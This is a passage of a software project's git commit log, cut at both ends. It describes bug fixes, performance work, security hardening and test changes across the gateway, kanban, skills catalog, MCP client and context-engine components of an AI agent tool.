- plugins/web/firecrawl/provider.py: supports_crawl() + crawl()
- plugins/web/tavily/provider.py: supports_crawl() + crawl()
- plugins/web/xai/provider.py: supports_crawl() override
- agent/web_search_provider.py: supports_crawl() + crawl() ABC methods
- agent/web_search_registry.py: get_active_crawl_provider() +
  the 'crawl' branch in _resolve()
- agent/display.py: web_crawl tool-progress rendering
- hermes_cli/config.py: 'web_crawl' from TAVILY_API_KEY.tools
- tools/website_policy.py: stale comment reference
- Tests: removed TestWebCrawlTavily class, the two website-policy
  web_crawl tests, the searxng/ddgs/brave-free crawl-error tests,
  the integration test_web_crawl method, and the
  test_unconfigured_crawl_emits_top_level_error test. Trimmed the
  capability-flag parametrize list and the WebSearchProvider ABC
  conformance tests.
- Docs: trimmed the Crawl column from capability tables in both EN
  and zh-Hans, updated the developer-guide ABC table.

Net: 25 files, +115/-1067.

Closes #33762 (the schema-text bug only existed if #32608 landed).
Supersedes #32608.
2026-05-28 04:52:42 -07:00
teknium1 b243afb68b fix(discord): skip backfill for auto-created threads and update test fakes
When auto-threading kicked in, the broadened backfill gate ran on the
freshly-created thread — but the thread has no prior context to fetch,
and the parent-channel reference passed to _fetch_channel_context would
have leaked unrelated context (see #31467).

Skip backfill when auto_threaded_channel is set.  Also teach the
_FakeTextChannel / _FakeThreadChannel test doubles to expose a no-op
history() async generator so the broadened gate doesn't trip
AttributeError → discord.Forbidden (MagicMock) → TypeError in the
existing auto-thread tests.  Add a regression test that asserts
auto-threaded messages do not trigger backfill.
2026-05-28 04:52:02 -07:00
teknium1 68ddd6b338 refactor(discord): inline backfill gate and document intent
Drop the _needed_mention local variable now that it has only one use,
inline its expression as _has_mention_gap, and add a comment explaining
the three backfill cases (mention-gated channel, thread, DM skip).

Behaviorally identical to the prior commit; cleanup only.

Co-authored-by: liuhao1024 <liuhao1024@users.noreply.github.com>
2026-05-28 04:52:02 -07:00
Pluviobyte eafe11d456 fix(gateway): backfill Discord thread context
Discord threads where the bot has already participated bypass mention gating by default, but the backfill check was still tied to the mention-needed condition. That meant follow-up thread messages could trigger a response without providing recent thread history to the session.

Run history backfill for thread messages whenever backfill is enabled, while keeping DMs skipped and channel mention backfill behavior unchanged. Add a regression test for a known thread follow-up without an explicit mention.

Fixes #33666

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-05-28 04:52:02 -07:00
Teknium a1eaad2fc0 perf(skills-page): lazy-fetch the catalog instead of bundling 34MB into JS (#33809)
PR #33748 grew the live skills index from ~2k skills to ~69k, which made
the previous build-time bundling strategy untenable: the skills page's
JS chunk was about to balloon from ~1MB to ~35MB.  Initial page load
on mobile became unusable, search lagged on every keystroke against the
68k-item array, and JSON.parse blocked the main thread at startup.

Three changes:

1. extract-skills.py writes skills.json + skills-meta.json into
   website/static/api/ instead of website/src/data/.  Static-served by
   Vercel as /docs/api/skills.json (gzipped on the wire), same CDN that
   already serves skills-index.json.

2. skills/index.tsx drops the static import and fetches both files in
   parallel on mount.  Loading state shows '…' for the count; failures
   surface a small error pill instead of blanking the page.

3. Search is debounced 150ms and runs against a precomputed lowercase
   haystack stamped onto each row at load time.  Before: array-join +
   toLowerCase per row per keystroke on a 68k array.  After: single
   .includes() per row, deferred until typing settles.

Validation:

| | before | after |
|---|---|---|
| skills.json location | src/data/ (bundled) | static/api/ (CDN) |
| Largest JS chunk | would be ~35MB at 68k skills | 659 KB |
| Initial page render | wait for full parse | immediate, fetch async |
| Per-keystroke filter | join+lowercase x 68k rows | single includes x 68k rows |
| Debounce | none | 150ms |

Built locally for both en and zh-Hans locales; the 34MB skills.json now
lives in build/api/ and is served separately rather than inlined into
the page's bundle.

skills.json and skills-meta.json added to .gitignore — they were already
build artifacts, but the gitignore only listed skills-index.json before.
2026-05-28 03:41:43 -07:00
teknium1 6f9182cb34 fix(kanban): content-addressed corrupt-DB backup filename
Repeated quarantines of an unchanged corrupt kanban.db used to amplify
disk usage by N: the gateway dispatcher's 5-minute retry loop, multi-
profile fleets sharing one DB, and manual reopen attempts each produced
a fresh '.corrupt.<timestamp>.bak' copy of the same bytes. After 10
retries on a 100KB DB you had 11x the disk footprint of duplicate
corrupt data.

Derive the backup filename from a sha256 of the main DB instead of a
timestamp + collision counter. Same bytes → same filename → skip the
copy on retries. Different bytes (partial repair, further damage) →
different filename → preserve separately. Sidecar (-wal/-shm) backups
inherit the same content-addressed name.

Inspired by @hanzckernel's PR #33529, simplified down to ~30 LOC: drop
the persistent JSON marker file, drop the atomic temp+fsync+rename
helper (shutil.copy2 is fine for a quarantine-only path), drop the
gateway-side WAL/SHM fingerprint extension (the existing
(path, mtime, size) tuple still gives the 5-minute retry semantics it
needs), and drop the gateway-side helper extraction. The backup file
existing IS the marker; no separate state needed.

Test: tests/hermes_cli/test_kanban_db.py::test_repeated_corrupt_open_reuses_single_backup
proves 10 retries on the same corrupt bytes produce 1 backup (was 11),
and mutating the corrupt bytes produces a second backup with a
different fingerprint.

Refs #33529
Co-authored-by: hanzckernel <zhicheng.han@mathematik.uni-goettingen.de>
2026-05-28 03:38:09 -07:00
Teknium 432a691758 fix(update): stream + idle-kill npm run build so a stalled webui-build can't soft-brick the install (#33803)
`hermes update` ran the webui build with `capture_output=True` and no timeout. On low-memory hosts (WSL2's 4 GB default, small VPSes, antivirus stalls) Vite goes silent for minutes; users see a frozen terminal, decide the update is hung, and reboot. The reboot lands *after* `pip install -e .` has already touched the install but *before* the build completes, leaving the `hermes` launcher in place while `hermes_cli` is no longer importable — i.e. `ModuleNotFoundError: No module named 'hermes_cli'` (#33788, same class as #32384).

Changes:

- New `_run_with_idle_timeout()` helper: streams subprocess output line-by-line (so the user sees Vite progress in real time) and kills the process if no bytes appear on stdout/stderr for 180s. The existing stale-dist fallback (#23817) then serves the previous build instead of failing the update.
- `_build_web_ui()` uses the helper for `npm run build` (the actual stall site). `npm install` keeps `subprocess.run` + capture_output to preserve the existing EPERM-retry-on-Windows contract.
- Both `cmd_update` call sites print `→ Core update complete. Building dashboard (optional)...` before the webui build. The CLI is fully functional at this point; a webui-build failure only affects `hermes dashboard`. Telegraphing the boundary explicitly stops users from rebooting through the build step.

Tests:

- `tests/hermes_cli/test_run_with_idle_timeout.py` — 4 tests covering streaming success, nonzero exit, idle-kill, and missing-binary cases. Uses real `subprocess.Popen` on tiny Python scripts; isolated in its own file so per-file canonical-runner parallelism doesn't pair it with the mock-heavy tests.
- `tests/hermes_cli/test_web_ui_build.py` — updated existing tests to patch `_run_with_idle_timeout` for the build step in addition to `subprocess.run` for the install step.
- `tests/hermes_cli/test_cmd_update.py::test_update_refreshes_repo_and_tui_node_dependencies` — same update.

Full suite: `scripts/run_tests.sh tests/hermes_cli/` → 5646 passed, 0 failed.

Fixes #33788.
2026-05-28 03:34:47 -07:00
teknium1 78be458608 fix(patch): widen new_string \t/\r unescape to all match strategies (#33733)
Extends @liuhao1024's escape-normalized fix so the patch tool also
recovers when old_string carries a real tab byte and matches via the
`exact` strategy — which is the headline reproduction in the issue and
the most common case in practice (LLMs frequently get old_string right
because they re-read the file, but still serialize new_string's tabs as
two-character `\t`).

Instead of gating on the match strategy, decide per-sequence by looking
at the *matched region of the file*: only convert `\t` -> tab and
`\r` -> CR when the file region we're replacing actually contains the
corresponding control byte. That mirrors the region-based heuristic in
`_detect_escape_drift` and keeps legitimate writes of the literal
two-character string `"\t"` (e.g. patching `sep = "\t"` in Python
source) untouched — those files have a backslash+t in the matched
region, not a real tab, so new_string passes through verbatim. `\n` is
still excluded because newlines serialize correctly through JSON and
unescaping would corrupt source escape sequences far more often than
help.

E2E verified against the live `patch` tool: tab-indented file + literal
`\t` in new_string under both `exact` (Variant 1) and `escape_normalized`
(Variant 2) strategies now produces real tab bytes; a Python source line
containing `sep = "\t"` (legitimate literal backslash-t) survives a
patch unchanged.

Tests updated to cover both strategies and the legitimate-literal case,
and to assert that `\n` is intentionally preserved.

Refs #33733
2026-05-28 03:27:20 -07:00
liuhao1024 e9f3f2b34a fix(tools): unescape common sequences in new_string when escape_normalized matches
When the patch tool matches via the escape_normalized strategy, old_string
contains literal \t, \n, \r sequences that get unescaped to match real
control characters in the file. However, new_string was written as-is,
leaving literal backslash sequences in the output.

Add _unescape_common_sequences() helper and apply it to new_string when
the matching strategy is escape_normalized. This ensures LLM-generated
tab/newline sequences become real bytes in the patched file.

Fixes #33733
2026-05-28 03:27:20 -07:00
Teknium 10ee4a729b fix(gateway): drain on Windows hermes gateway stop so sessions survive restart (#33798)
Sessions now survive `hermes gateway stop` / `restart` on native Windows.
Previously the gateway died on schtasks `/End` + os.kill SIGTERM without
ever running the drain loop, so the v0.13.0 session-resume feature (#21192)
silently broke on Windows: `resume_pending=True` was never written, and
the next boot started with a blank conversation history (issue #33778).

Root cause is twofold and the reporter only identified half of it:

1. `hermes_cli/gateway_windows.py::stop()` did not write the
   `planned_stop_marker` before signalling. The reporter caught this.

2. The bigger reason: `asyncio.add_signal_handler` raises
   NotImplementedError for SIGTERM/SIGINT on Windows, so even if the
   marker had been written, the gateway's existing SIGTERM handler
   (which is what calls `runner.stop()` and the `mark_resume_pending`
   loop) was never invoked. Writing the marker would have been
   necessary-but-insufficient.

The fix has two parts:

* gateway/run.py: new `_run_planned_stop_watcher` daemon thread polls
  for the planned-stop marker file every 0.5s. When the marker appears
  it `loop.call_soon_threadsafe(shutdown_signal_handler, None)` — the
  same shutdown path a real SIGTERM would have driven, including the
  pre-drain `mark_resume_pending` writes (run.py:5977) and graceful
  drain wait. The existing signal handler already accepts
  `received_signal=None` and falls through to
  `consume_planned_stop_marker_for_self()`, so no handler changes
  needed. Runs on every platform as cheap belt-and-suspenders.

* hermes_cli/gateway_windows.py: `stop()` now writes the marker for
  the running gateway PID and waits up to `agent.restart_drain_timeout`
  (default 30s) for the PID to exit cleanly. On clean drain, the kill
  sweep is non-forceful; on timeout, escalates to
  `kill_gateway_processes(force=True)` which routes to taskkill /T /F
  per `references/windows-native-support.md`.

Validation:

* 7 new tests in tests/gateway/test_planned_stop_watcher.py covering:
  marker→handler dispatch, no-marker idle, already-draining skip,
  not-yet-running skip, stop_event responsiveness, fire-once
  semantics, error tolerance.
* 8 new tests in tests/hermes_cli/test_gateway_windows.py covering:
  marker-before-kill ordering, clean-drain skips force-kill,
  drain-timeout escalates to force=True, no-pid-skips-drain,
  invalid-pid handling, fast-exit success, timeout failure,
  marker-write-failure tolerance.
* E2E (Linux, detached orphan): write_planned_stop_marker(pid) +
  `_drain_gateway_pid(pid, 5.0)` returns True in 0.5s after the
  victim sees the marker and exits. Tested with a double-forked
  subprocess so the test parent isn't holding it as a zombie.
* Targeted: tests/gateway/{restart_drain,restart_resume_pending,
  signal,signal_format,status,shutdown_forensics,approve_deny_commands,
  planned_stop_watcher} + tests/hermes_cli/{gateway_windows,
  gateway_service} → 519/519.

What was wrong with the reporter's claim (for future archaeology): they
described the symptom as "no `resume_pending=True` written to
`sessions.json`" — but Hermes uses `state.db` (SQLite), not
`sessions.json`, and `mark_resume_pending` is called regardless of
the marker (the marker only affects exit code 0 vs 1 for systemd
revival semantics). The real session-loss path is the missing drain
on Windows, not a missing marker. Both halves are fixed here.

Closes #33778.
2026-05-28 03:25:32 -07:00
teknium1 f8896dedc8 chore(release): map biser@bisko.be -> bisko in AUTHOR_MAP 2026-05-28 03:21:00 -07:00
Biser Perchinkov b5495db701 fix(agent): re-pad reasoning_content on cross-provider fallback to require-side providers
api_messages is built once before the retry loop while the primary provider
is active. When a mid-conversation fallback switches to a require-side thinking
provider (DeepSeek/Kimi/MiMo), assistant turns built under a non-require primary
(e.g. Codex) go out without reasoning_content and the new provider rejects the
request with HTTP 400 ("reasoning_content must be passed back").

Re-apply the echo-back pad against the current provider immediately before
building the request kwargs. Idempotent and a no-op unless the active provider
enforces echo-back, so it covers all fallback paths without affecting normal or
reject-side operation.

Drafted by Claude (Opus 4.7) under human review while fixing a personal deployment.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
2026-05-28 03:21:00 -07:00
Indigo Karasu 9179396cb7 fix(stream-consumer): only set _final_content_delivered when final response confirmed delivered
In GatewayStreamConsumer._run(), _final_content_delivered was set to True
based on the success of a mid-stream finalize edit, before the final
finalize edit was attempted. When the final edit later failed (Telegram
flood control, retry-after), _final_response_sent stayed False but
_final_content_delivered was already True, so gateway/run.py suppressed
its normal final send and the user saw a partial / fallback message
instead of the real answer.

Changes in gateway/stream_consumer.py:
- Remove the premature _final_content_delivered = True at the top of
  the got_done block.
- Set _final_content_delivered = True only when the actual final send /
  edit succeeds, in each finalize branch (no-finalize adapter,
  _message_id finalize, no-_already_sent send).
- _send_fallback_final: don't set _final_response_sent = True when only
  some chunks were delivered; the gateway should still attempt a
  complete final send. Set _final_content_delivered = True alongside
  _final_response_sent on the success path and short-text path.
- Cancellation handler: set _final_content_delivered = True alongside
  _final_response_sent when the best-effort final edit succeeds.

Adds TestFinalContentDeliveredGuard with 3 regression tests covering
the core bug scenario, the happy path, and partial fallback.

Closes #33708
Closes #25010
Refs #29200

Co-authored-by: Teknium <127238744+teknium1@users.noreply.github.com>
2026-05-28 03:15:19 -07:00
Dusk1e a91b1c8b31 fix(tirith): reject non-regular tar members during auto-install process 2026-05-28 02:49:26 -07:00
teknium1 247b24b49f chore(release): add AUTHOR_MAP entry for AdityaRajeshGadgil 2026-05-28 02:45:25 -07:00
Aditya Rajesh Gadgil 031983bbf8 fix: limit pre-update state snapshots 2026-05-28 02:45:25 -07:00
Teknium 8b6beaab5f docs: 30-day overhaul — correctness audit, PR coverage, Nous Portal weave, sidebar reorg (#33782)
* docs(audit): correctness pass across getting-started, reference, features, messaging, developer-guide, guides, integrations, user-guide

* docs: add PR coverage for last 30d + Nous Portal weave + nav reorg + build fixes

- Add docs for top user-visible PRs that shipped without docs (api-server
  session control, kanban features, telegram pin/edit, provider client tag,
  xAI retired-model migration, cron name lookup, --branch update flag, etc.)
- Apply Nous Portal weave across 23 pages (tasteful one-liners on
  getting-started/learning-path, configuration, overview, vision, x-search,
  credential-pools, provider-routing, cron, codex-runtime, profiles, docker,
  messaging/index, multiple guides, plus FAQ + index promotion)
- Reorganize sidebar: split Messaging into Popular/M365/Chinese/Other,
  Reference into Command/Configuration/Tools-Skills sub-categories, add
  orphan developer-guide pages (web-search-provider-plugin,
  browser-supervisor), move features from Integrations back to Features,
  fold lone spotify into Media & Web.
- Regenerate skill stubs + catalogs (kanban-codex-lane, hermes-s6-container-
  supervision, web-pentest)
- Fix broken anchor links (security/cron, configuration/fallback, telegram
  large-files, adding-platform-adapters step-by-step)
2026-05-28 02:41:36 -07:00
teknium1 c7f7783e5c test(xai-proxy): regression coverage for #28932 429 handling
Three new tests in tests/hermes_cli/test_proxy.py:

- xai_adapter_retry_rotates_pool_entry_on_429 — headline #28932 case.
  Two-entry pool, 429 on first entry, must rotate to second entry
  AND must NOT call refresh_xai_oauth_pure (refresh is irrelevant
  for rate limits).
- xai_adapter_retry_returns_none_on_429_when_pool_exhausted —
  single-entry pool: 429 returns None so the rate-limit response
  flows back to the client unchanged (existing behavior preserved).
- xai_adapter_retry_returns_none_for_unrelated_status — non-{401,
  429} statuses must not trigger any retry path at all; guards
  against the gate becoming too broad in future changes.

Each test asserts that refresh_xai_oauth_pure is never called on the
429 path — refresh is a 401-specific concern.

39/39 in tests/hermes_cli/test_proxy.py.
2026-05-28 02:36:37 -07:00
sprmn24 4ed482549f fix(xai-proxy): handle 429 rate-limit responses in proxy retry path
get_retry_credential only triggered on 401; a 429 Too Many Requests from
xAI was silently streamed back with no key rotation or back-off signal.

- server.py: widen retry gate from == 401 to in {401, 429}
- xai.py: on 429, skip token refresh and call mark_exhausted_and_rotate
  to stamp the 1-hour cooldown on the rate-limited key and return the
  next available credential. Returns None if pool is exhausted.
2026-05-28 02:36:37 -07:00
Dusk1e aa3466063b fix(android): reject unsafe tar members in psutil compatibility installer 2026-05-28 02:36:09 -07:00
Teknium bb0ac5ced2 chore(release): AUTHOR_MAP entry for vynxevainglory-ai
PR #29233 salvage.
2026-05-28 02:33:51 -07:00
Teknium 70abae8e3b fix(kanban): show horizontal scrollbar instead of wrapping columns
Salvage follow-up on top of @vynxevainglory-ai's PR #29233. Keep the
column-body flex:1 + min-height:0 fix (tall columns scroll internally
now), but drop the flex-wrap: wrap part — instead just stop hiding
the existing horizontal scrollbar.

PR #523254b34 (sadiksaifi, May 18) deliberately moved the kanban board
from a wrapping grid to a single-row pinned-width flex so the board
stays as one stable horizontal row. The mistake in that PR was the
scrollbar-width: none + ::-webkit-scrollbar { display: none } pair,
which hid the affordance so columns past the viewport became visually
inaccessible. Fixing that hidden-scrollbar bug while keeping the
single-row design honors both contributors' intent.
2026-05-28 02:33:51 -07:00
Vynxe Vainglory 538f0fa339 fix(kanban): wrap columns into rows and fix vertical overflow
Two CSS issues in the kanban dashboard:

1. Columns overflow horizontally with no way to reach them — the
   original scrollbar-width: none hid the scrollbar entirely, and
   even with a scrollbar, a wrapping layout is better UX for a board
   with 8+ columns. Changed to flex-wrap: wrap and removed the
   overflow-x: auto + hidden scrollbar rules. Columns now flow into
   multiple rows (~3 per row on a typical viewport) instead of
   running off-screen.

2. .hermes-kanban-column-body lacked flex: 1 and min-height: 0,
   so the flex child's implicit min-height: auto prevented it from
   shrinking below its content size. Columns with many cards pushed
   past the parent max-height instead of scrolling internally.

Verified: 9 columns wrap into 3 rows, all visible without
horizontal scroll. Done column (53 tasks) scrolls vertically
within its column bounds.
2026-05-28 02:33:51 -07:00
teknium1 9b5dae17a5 feat(context-engine): host contract for external context engines
Condenses the substance of PRs #16453, #17453, #16451, #17600, and #13373
into a minimal generic host contract that external context engine plugins
(e.g. hermes-lcm) need to integrate cleanly. Drops scaffolding that
duplicated existing infrastructure or had marginal value.

Five concrete changes:

1. `_transition_context_engine_session()` on AIAgent — generic lifecycle
   helper that fires on_session_end → on_session_reset → on_session_start
   → optional carry_over_new_session_context. Engines implement only the
   hooks they need; missing hooks are skipped. Built-in compressor keeps
   its existing reset-only behavior because callers default to no
   metadata. `reset_session_state()` now optionally accepts
   previous_messages / old_session_id / carry_over_context and delegates
   to the transition helper when provided. (#16453)

2. `conversation_id` passed to `on_session_start()` — both the
   agent-init call site and the compression-boundary call site now
   forward `self._gateway_session_key` so plugin engines have a stable
   conversation identity that survives session_id rotation (compression
   splits, /new, resume). The key already existed on AIAgent; it just
   wasn't reaching engines. (#16453)

3. Canonical cache buckets forwarded to engines — the usage dict passed
   to `update_from_response()` now includes input_tokens, output_tokens,
   cache_read_tokens, cache_write_tokens, and reasoning_tokens on top of
   the legacy prompt/completion/total keys. Engines can make decisions on
   cache-hit ratios and reasoning costs instead of only aggregates. ABC
   docstring updated. (#17453)

4. Plugin-registered context engines visible in the picker —
   `_discover_context_engines()` in plugins_cmd.py now also includes
   engines registered via `ctx.register_context_engine()` from plugin
   manifests, deduplicating by name so repo-shipped descriptions win on
   collision. (#16451)

5. `_EngineCollector.register_command()` — context engines using the
   standard `register(ctx)` pattern can now expose slash commands (e.g.
   `/lcm`). Routes to the global plugin command registry with the same
   conflict-rejection policy regular plugins use (no shadowing built-ins,
   no clobbering other plugins). Previously these calls hit a no-op and
   the slash commands silently never appeared. (#17600)

Dropped from the original 5 PRs:

- Compression boundary signal (`boundary_reason="compression"`) from
  #16453 — already on main at `agent/conversation_compression.py:412-424`,
  landed via the bg-review extraction.

- `discover_plugins()` before fallback in run_agent.py from #16451 —
  redundant: `get_plugin_context_engine()` already routes through
  `_ensure_plugins_discovered()` which is idempotent.

- Runtime identity diagnostics method + helpers from #13373 (+251 LOC) —
  operators can already read engine state via `engine.get_status()`;
  the diagnostics view added marginal value relative to its surface area.

- The 553-LOC slash-command machinery from #17600 — replaced with a
  20-LOC `register_command` method on the collector that reuses the
  existing plugin command registry instead of building a parallel one.

Net: ~215 LOC of host-contract changes + 282 LOC of focused tests, vs
~1,176 LOC across the original 5 PRs.

Co-authored-by: Tosko4 <1294707+Tosko4@users.noreply.github.com>

Closes #16453.
Closes #17453.
Closes #16451.
Closes #17600.
Closes #13373.
Related: stephenschoettler/hermes-lcm#68.
2026-05-28 01:45:30 -07:00
Teknium fb9f3a4ef9 fix(skills): pull full ClawHub catalog into the skills index (200 → 20k+) (#33748)
* fix(skills): pull full ClawHub catalog into the skills index

The website was showing 200 ClawHub skills out of 20k+ because
`ClawHubSource.search("")` for empty queries went straight to a single
unpaginated request. ClawHub's API caps any single page at 200 items and
returns a `nextCursor`; we grabbed page 1 and stopped, so the cached
index served from hermes-agent.nousresearch.com had a silent 99%
truncation.

End users never hit clawhub.ai directly (the index is rebuilt twice
daily by .github/workflows/skills-index.yml and served as a static JSON
on the docs site), so the cap-and-cache architecture is correct — it
just wasn't being filled.

Changes:
- `ClawHubSource.search(query="")` now routes through the existing
  `_load_catalog_index()` paginating walker instead of the unpaginated
  listing fallback (non-empty queries still hit the fast catalog search).
- `_load_catalog_index()` max_pages 50 → 250 (50k-skill ceiling; live
  catalog is ~20k as of May 2026, with headroom for growth).
- `build_skills_index.py`: per-source crawl limits split out — ClawHub
  and LobeHub get 100k, others keep their effective caps.
- `EXPECTED_FLOORS["clawhub"]` 50 → 5000 so the next pagination
  regression hard-fails the CI build instead of silently shipping a
  degenerate index.

Test plan:
- New unit test `test_search_empty_query_paginates_full_catalog`
  exercises the cursor-following path with three mocked pages (450
  total items) and asserts all pages are walked.
- Existing 9 ClawHub tests + 127 broader skills_hub tests all pass.
- E2E against live ClawHub API: walker reached 9700+ skills across 49
  pages before this commit landed, paginating well past the previous
  50-page cap.

* fix(skills): raise ClawHub ceilings — live catalog is 50k, not 20k

E2E walk against live ClawHub API hit my initial 250-page cap at 49,698
skills with cursor=yes still pending. The catalog is roughly 2.5x larger
than the docstring estimate.

- max_pages 250 → 750 (150k ceiling, walks terminate on cursor=None
  well before this in practice)
- SOURCE_LIMITS['clawhub'] 100k → 200k
- EXPECTED_FLOORS['clawhub'] 5000 → 20000
2026-05-28 01:42:19 -07:00
Teknium 09a5cd8084 fix(auth): sync manual:device_code Codex pool entries on re-auth (#33744)
#33164 made _save_codex_tokens sync the singleton-seeded `device_code`
pool entry on Codex OAuth re-auth. That fixed the #33000 path but missed
`manual:device_code` entries created by `hermes auth add openai-codex`
(the recommended workaround for users who hit #33000 before #33164
landed).

Every subsequent re-auth would refresh the device_code entry but leave
the manual:device_code entry holding the consumed refresh token plus
stale last_error_* markers — immediately recreating the 401
token_invalidated symptom on the next request, exactly as reported in
#33538.

Extend the refreshable source set to include `manual:device_code`.
Completing the device-code OAuth flow proves the user owns the ChatGPT
account, so it is safe to refresh every device-code-backed entry. Keep
`manual:api_key` and other non-device-code manual sources untouched —
those represent independent credentials.

Closes #33538.
2026-05-28 01:33:10 -07:00
Dusk1e 43abc51f66 fix(security): require source CIDR allowlisting for public msgraph webhook binds 2026-05-28 01:26:18 -07:00
Teknium 986abb3cf7 docs: drop stale Kimi/DeepSeek vision example (#33736)
Kimi K2.6 is natively multimodal — flagged by Shengyuan from the Kimi
growth team. Replace the named-vendor example with a model-agnostic
phrasing so the row doesn't go stale as more vendors ship vision.
2026-05-28 01:23:38 -07:00
Teknium 87e5b2fae0 feat(mcp): support TLS client certificates (mTLS) for HTTP and SSE servers (#33721)
Adds first-class `client_cert` / `client_key` config keys so MCP servers
behind mTLS work without an external TLS-terminating proxy. Resolves
inbound community question (Jeremy W.).

Schema (per `mcp_servers.<name>`, HTTP/SSE only):

- `client_cert: "/path/to/combined.pem"` — single PEM with cert + key
- `client_cert: "/path/to/cert"` + `client_key: "/path/to/key"` — separate
- `client_cert: [cert, key]` or `[cert, key, password]` — list form,
  with optional passphrase for encrypted keys

Paths support `~` expansion. Missing files raise a server-scoped
`FileNotFoundError` at connect time rather than failing later with an
opaque TLS handshake error.

Wiring:

- New SDK HTTP path (mcp >= 1.24): `cert=` on the user-owned
  `httpx.AsyncClient` alongside the existing `verify=` handling.
- SSE path: routed through an `httpx_client_factory` that wraps the
  SDK's defaults (follow_redirects=True) and layers `verify` + `cert`
  on top. The factory is only injected when needed, so the SDK's
  built-in `create_mcp_http_client` keeps being used in the default
  case.
- Deprecated mcp<1.24 path left untouched — that SDK's
  `streamablehttp_client` signature doesn't expose `cert`, and adding
  it would be dead code.

Also documents the previously-undocumented `ssl_verify` key (bool or
CA bundle path) in the MCP config reference.

Tests:

- `tests/tools/test_mcp_client_cert.py` (new, 19 tests):
  - `_resolve_client_cert` helper: all three input forms, `~` expansion,
    missing-file and validation errors.
  - HTTP transport: `cert=` forwarded into `httpx.AsyncClient` for
    string and tuple forms; absent when unset; missing-file error
    propagates.
  - SSE transport: factory only injected when cert or non-default
    verify is set; factory applies cert, custom CA bundle, and
    preserves `follow_redirects=True` + forwarded headers/auth.
- Existing tests: 200/200 in `test_mcp_tool.py` + `test_mcp_sse_transport.py`
  still pass.
2026-05-28 00:55:55 -07:00
Stephen Schoettler 8595281f3c fix: expose context engine tools with saved toolsets 2026-05-28 00:28:42 -07:00
Dusk1e 1a9ef83147 fix(security): require API_SERVER_KEY before dispatching API server work 2026-05-28 00:25:08 -07:00
LeonSGP43 442a9203c0 Fix xAI OAuth timeout manual fallback 2026-05-28 00:24:17 -07:00
helix4u 459d7694d3 fix(agent): preload jiter native parser 2026-05-28 00:20:11 -07:00
Robin Fernandes dc52b82d53 test(auth): update entitlement CI expectations 2026-05-28 00:19:31 -07:00
Robin Fernandes 1cf5e639b3 fix(auth): refresh Nous entitlement in tool menus 2026-05-28 00:19:31 -07:00
Robin Fernandes 406901b27d feat(auth) normalise the way in which we check whether a user has free/paid access to nous portal so we can expose behaviour and error messages accordingly. 2026-05-28 00:19:31 -07:00
stephenschoettler 0bf9b867cf fix(website): pin serialize-javascript and uuid via npm overrides
Resolves the two Dependabot alerts currently open against the website
lockfile:

- serialize-javascript: pin to ^7.0.5 (was 6.0.2 — high-severity RCE
  via RegExp.flags + Date.prototype.to*, plus medium-severity DoS)
- uuid: pin to ^14.0.0 (was 8.3.2 — medium buffer bounds check miss
  in v3/v5/v6 when buf is provided)

Lockfile regenerated against current main (not the stale lockfile
from the original PR — several Dependabot bumps for mermaid,
webpack-dev-server, @babel/plugin-transform-modules-systemjs,
fast-uri, lodash-es+langium, lodash, follow-redirects, and dompurify
have landed since #30036 was opened, so the website portion was
re-applied surgically on top of those).

Salvaged the website half of PR #30036. The TUI test half landed
on main separately, so this PR is web-only.
2026-05-28 00:07:54 -07:00
kshitijk4poor 7b778db472 chore(release): map MoonRay305 contributor email for #32759 salvage
Adds `squiddy@2rook.ai → MoonRay305` to AUTHOR_MAP so contributor_audit.py
passes for the salvaged commits in #33482-followup PR.
2026-05-27 23:28:51 -07:00
Squiddy 3ba8962738 fix(kanban): add Windows init lock guard 2026-05-27 23:28:51 -07:00
Squiddy 90b6b3d18f fix(kanban): harden sqlite connection concurrency 2026-05-27 23:28:51 -07:00
Brian D. Evans 3ad46933d3 docs(voice): use uv pip install faster-whisper in STT install hints (#29800)
* docs(voice): use `uv pip install faster-whisper` in STT install hints

Three runtime messages told users to `pip install faster-whisper`
(reported in #29782 for the gateway STT failure message under
Telegram-in-Docker, where the user hit `bash: pip: command not
found`). The Hermes Docker image is built on `ghcr.io/astral-sh/uv`
with a uv-managed venv that doesn't ship `pip` on PATH; users on
modern `uv tool install` / `uv venv` installs see the same problem.

The canonical install command in this repo is `uv pip install`
(see `tools/lazy_deps.py:509` `feature_install_command()`), which
works in Docker (uv image), in `uv tool install` venvs, and in
pip-based venvs that already have uv on PATH.

Changed three locations to match:

- `gateway/run.py` — Telegram/Discord/Slack/WhatsApp/etc. voice
  reply when no STT provider is configured. Suggests
  `uv pip install faster-whisper` and notes that
  `pip install faster-whisper` also works if `pip` is on PATH.
- `tools/voice_mode.py` — `/voice` status line for missing STT.
- `cli.py` — Voice-mode startup error, "Option 1".

No behavior change beyond the user-facing text. No production
code path was touched.

* docs(voice): add pip fallback to cli + voice_mode STT hints

Copilot flagged that cli.py and tools/voice_mode.py recommend
`uv pip install faster-whisper` without a fallback for environments
where uv isn't on PATH. The gateway/run.py message already lists
`pip install faster-whisper` as an alternative; this commit aligns
the two remaining call sites to match.

Addresses inline Copilot review on #29800.

---------

Co-authored-by: briandevans <252620095+briandevans@users.noreply.github.com>
2026-05-28 16:23:14 +10:00
Teknium 4e702fe2d9 test(ci): harden two flaky tests against CI noise (#33675)
Two unrelated transient failures on PR #33661's initial CI run, both
pre-existing on main and recovered on rerun. Hardening:

1. tests/cron/test_scheduler.py::TestRunJobConfigLogging — added mocks for
   resolve_runtime_provider() and discover_mcp_tools(). The yaml-warning
   tests intend to exercise only the warning-log path, but
   _run_job_impl continues into provider resolution and MCP discovery
   after the warning. Both can spawn subprocesses / hit the network and
   pushed the test over its 30s budget under GHA load.

2. tests/tools/test_browser_supervisor.py — wrapped Chrome teardown
   against the stdlib subprocess._wait() race (bpo-38630). When SIGCHLD
   arrives during proc.wait(), _try_wait(WNOHANG) can return a foreign
   pid and the 'assert pid == self.pid or pid == 0' fires. Fixture now
   catches AssertionError/TimeoutExpired, force-kills, and always reaps
   so no zombie escapes. Same hardening applied to the early-skip branch.
2026-05-27 23:15:41 -07:00
Ben 875d930ac7 test(docker-update): stub subprocess.run in git-install regression guard
The regression-guard test
`test_cmd_update_on_git_install_does_not_print_docker_message` mocked
`is_managed` and `detect_install_method` but not `subprocess.run`, so
once `cmd_update(check=True)` decided this was a git install it shelled
out to a real `git fetch upstream` / `git fetch origin`. On CI runners
the worktree has no `upstream` remote configured and the fetch hung
past the 30s pytest-timeout — test (4) slice failed in #33659 CI.

Fix: stub `subprocess.run` with a successful CompletedProcess-shaped
object whose stdout is `"0\n"`, so:
  - no real git command is ever invoked
